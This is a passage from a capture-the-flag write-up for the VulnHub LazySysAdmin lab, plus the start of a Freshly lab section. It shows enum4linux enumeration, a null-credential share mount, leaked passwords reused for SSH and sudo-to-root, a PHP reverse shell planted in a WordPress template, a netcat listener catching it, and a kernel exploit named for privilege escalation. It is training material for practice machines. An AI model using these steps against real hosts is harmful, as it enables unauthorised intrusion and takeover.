class="cm-number">192</span>.168.0.100 allows sessions using username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Getting domain SID <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Name: WORKGROUP</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Domain Sid: (NULL SID)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Can<span class="cm-string">'t determine if host is part of domain or part of a workgroup</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| OS information on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=======================================</span> </span></pre><pre 
class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from smbclient: </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Got OS info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 from srvinfo:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>LAZYSYSADMIN Wk Sv PrQ Unx NT SNT Web server</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>platform_id :<span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-number">500</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>os version :<span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-number">6</span>.1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>server type :<span class="cm-tab" role="presentation" cm-text=" "> </span>0x809a03</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">| Users on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Share Enumeration on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==========================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>Sharename Type Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-attribute">---------</span> <span class="cm-attribute">----</span> <span 
class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>print<span class="cm-def">$ </span> Disk Printer Drivers</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>share<span class="cm-def">$ </span> Disk Sumshare</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>IPC<span class="cm-def">$ </span> IPC IPC Service (Web server)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Reconnecting with SMB1 <span class="cm-keyword">for</span> workgroup listing.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>Server Comment</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-attribute">---------</span> <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>Workgroup Master</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-attribute">---------</span> <span class="cm-attribute">-------</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>WORKGROUP </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attempting to map shares on <span class="cm-number">192</span>.168.0.100</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/print<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text=" "> </span>Mapping</span>: DENIED, Listing: N/A</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/share<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text=" "> </span>Mapping</span>: OK, Listing: OK</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">//192.168.0.100/IPC<span class="cm-def">$<span class="cm-tab" role="presentation" cm-text=" "> </span></span>[E] Can<span class="cm-string">'t understand response:</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">WARNING: The <span class="cm-string">"syslog"</span> option is deprecated</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Password Policy Information <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">=====================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Attaching to <span class="cm-number">192</span>.168.0.100 using a NULL share</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Trying protocol <span class="cm-number">445</span>/SMB...</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Found domain(s):</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 
0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Builtin</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Password Info <span class="cm-keyword">for</span> Domain: LAZYSYSADMIN</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Minimum password length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Password history length: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Maximum password age: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Password 
Complexity Flags: <span class="cm-number">000000</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Refuse Password Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Password Store Cleartext: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Password Lockout Admins: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Password No Clear Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Password No Anon Change: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span 
role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Domain Password Complex: <span class="cm-number">0</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Minimum password age: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Reset Account Lockout Counter: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Locked Account Duration: <span class="cm-number">30</span> minutes </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Account Lockout Threshold: None</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-tab" role="presentation" cm-text=" "> </span>[<span class="cm-operator">+</span>] Forced Log off Time: Not Set</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span 
cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Retieved partial password policy with rpcclient:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Password Complexity: Disabled</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Minimum Password Length: <span class="cm-number">5</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Groups on <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">===============================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span 
cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting builtin group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting local group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain groups:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Getting domain group memberships:</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">| Users on <span class="cm-number">192</span>.168.0.100 via RID cycling (RIDS: <span class="cm-number">500</span><span class="cm-attribute">-550</span>,1000-1050) |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">========================================================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-22-1</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-21-2952042175-1524911573-1237092750</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[I] Found new SID: S-1-5-32</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-32 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-544 BUILTIN\Administrators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-545 BUILTIN\Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-546 BUILTIN\Guests (Local Group)</span></pre><pre 
class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-547 BUILTIN\Power Users (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-548 BUILTIN\Account Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-549 BUILTIN\Server Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-550 BUILTIN\Print Operators (Local Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1000 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-32-1001 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-22-1 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-22-1-1000 Unix User\togie (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">[<span class="cm-operator">+</span>] Enumerating users using SID S-1-5-21-2952042175-1524911573-1237092750 and logon username <span class="cm-string">''</span>, password <span class="cm-string">''</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" 
style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-500 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-501 LAZYSYSADMIN\nobody (Local User)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-512 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-513 LAZYSYSADMIN\None (Domain Group)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">S-1-5-21-2952042175-1524911573-1237092750-514 *unknown*\*unknown* (8)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">| Getting printer info <span class="cm-keyword">for</span> <span class="cm-number">192</span>.168.0.100 |</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"> <span class="cm-operator">==============================================</span> </span></pre><pre class=" CodeMirror-line " 
role="presentation"><span role="presentation" style="padding-right: 0.1px;">No printers returned.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span cm-text=""></span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">enum4linux complete on Thu Feb 1 00:46:33 2018</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 4142px;"></div><div class="CodeMirror-gutters" style="display: none; height: 4172px;"></div></div></div></pre><p>Accessing the share from Windows</p><pre class="md-fences md-end-block" lang="bash">net use k: \\192.168.0.100\share$</pre><p>Accessing the share from Linux</p><pre class="md-fences md-end-block" lang="bash">mount -t cifs -o username='',password='' //192.168.0.100/share$ /mnt</pre><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/2.png' alt='2' referrerPolicy='no-referrer' /></p><p>Two key files are found: deets.txt and wp-config.php</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/3.png' alt='3' referrerPolicy='no-referrer' /></p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/4.png' alt='4' referrerPolicy='no-referrer' /></p><p>Trying the MySQL credentials obtained above to log in to phpMyAdmin works, but none of the tables can be viewed.</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/5.png' alt='5' referrerPolicy='no-referrer' /></p><p>In addition, another password found above is 12345, and the WordPress page seen earlier displayed <code>My name is togie.</code>, so logging in over SSH with username <code>togie</code> and password <code>12345</code> is worth a try, and it succeeds.</p><pre class="md-fences md-end-block" lang="bash">togie@LazySysAdmin:~$ whoami
togie
togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)
togie@LazySysAdmin:~$ sudo su
[sudo] password for togie: 
root@LazySysAdmin:/home/togie# id
uid=0(root) gid=0(root) groups=0(root)</pre><p>With root privileges the target file /root/proof.txt can be read, which completes the whole game. Here togie happens to have sudo rights, so switching to root with <code>sudo su</code> works directly; if togie had no such rights, another privilege-escalation path would be needed.</p><h3><a name='header-n8459' class='md-header-anchor '></a>Approach 2</h3><p>Log in to the WordPress dashboard with username <code>Admin</code> and password <code>TogieMYSQL12345^^</code>, and insert PHP reverse-shell code into the 404.php page template.</p><p><img src='https://mochazz.github.io/img/vulnhub-LazySysAdmin/7.png' alt='7' referrerPolicy='no-referrer' /></p><p>After editing, click the "upload file" button below to apply the change, then visit <a href='http://192.168.0.100/wordpress/?p=2' target='_blank' class='url'>http://192.168.0.100/wordpress/?p=2</a></p><pre class="md-fences md-end-block" lang="bash" style="break-inside: unset;">root@kali:~# nc -vlp 1234
listening on [any] 1234 ...
192.168.0.100: inverse host lookup failed: Unknown host
connect to [192.168.0.109] from (UNKNOWN) [192.168.0.100] 36468
Linux LazySysAdmin 4.4.0-31-generic #50~14.04.1-Ubuntu SMP Wed Jul 13 01:06:37 UTC 2016 i686 i686 i686 GNU/Linux
 16:03:42 up 6 min, 0 users, load average: 0.01, 0.15, 0.11
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ sudo su
sudo: no tty present and no askpass program specified</pre><p>The error "no tty present and no askpass program specified" appears. The target happens to have Python, so use Python to spawn a new shell attached to a pty.</p><pre class="md-fences md-end-block" lang="bash">python -c 'import pty; pty.spawn("/bin/sh")'</pre><p>The www-data password is unknown, however, so the next step is privilege escalation. First collect the target's details:</p><pre class="md-fences md-end-block" lang="bash">$ uname -r
4.4.0-31-generic
$ lsb_release -a
No LSB modules are available.
Distributor ID:	Ubuntu
Description:	Ubuntu 14.04.5 LTS
Release:	14.04
Codename:	trusty</pre><p>So CVE-2017-1000112 can be used for privilege escalation, but the target has no gcc. In that case, set up a local environment identical to the target, compile the privilege-escalation exploit there, and run the binary on the target.</p><p>How to install dirb (Kali already ships with it)</p><pre class="md-fences md-end-block" lang="bash">wget https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz
tar zxvf dirb222.tar.gz
cd dirb222/
apt-get install libcurl4-gnutls-dev
./configure &amp;&amp; make
./dirb # run it</pre><p>References:</p><p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p><p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p><p> </p><h1><a name='header-n8486' class='md-header-anchor '></a>Section 6: Freshly</h1><p> </p><h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1><h2><a name='header-n8490' class='md-header-anchor '></a>Target overview</h2><h3><a name='header-n8491' class='md-header-anchor '></a>Download link</h3><p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p><h3><a name='header-n8494' class='md-header-anchor '></a>Runtime environment</h3><ul><li>VirtualBox</li><li>VMware (running it reports an error, and the fix link provided is now a 404)</li></ul><p>VirtualBox is recommended for this machine.</p><h3><a name='header-n8504' class='md-header-anchor '></a>Description</h3><p>The goal of this machine is to penetrate the host over the network and find the secret hidden in a sensitive file.</p><h3><a name='header-n8508' class='md-header-anchor '></a>Setup</h3><p>Import the downloaded OVA file into VirtualBox.</p><h2><a name='header-n8511' class='md-header-anchor '></a>Attack approach</h2><h3><a name='header-n8512' class='md-header-anchor '></a>Service discovery</h3><p>Port scan</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>OS identification</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Further scan of the main ports</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Port 80</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Port 8080</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Ports 8080 and 443 are both web services, and both run WordPress.</p><h3><a name='header-n8535' class='md-header-anchor '></a>Checking known services</h3><p>Scanning WordPress</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Three plugins have security issues, but they are of little help for further penetration. In parallel, a directory scan of port 80 with <code>nikto</code> finds phpmyadmin and login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Testing with sqlmap</p><p><img 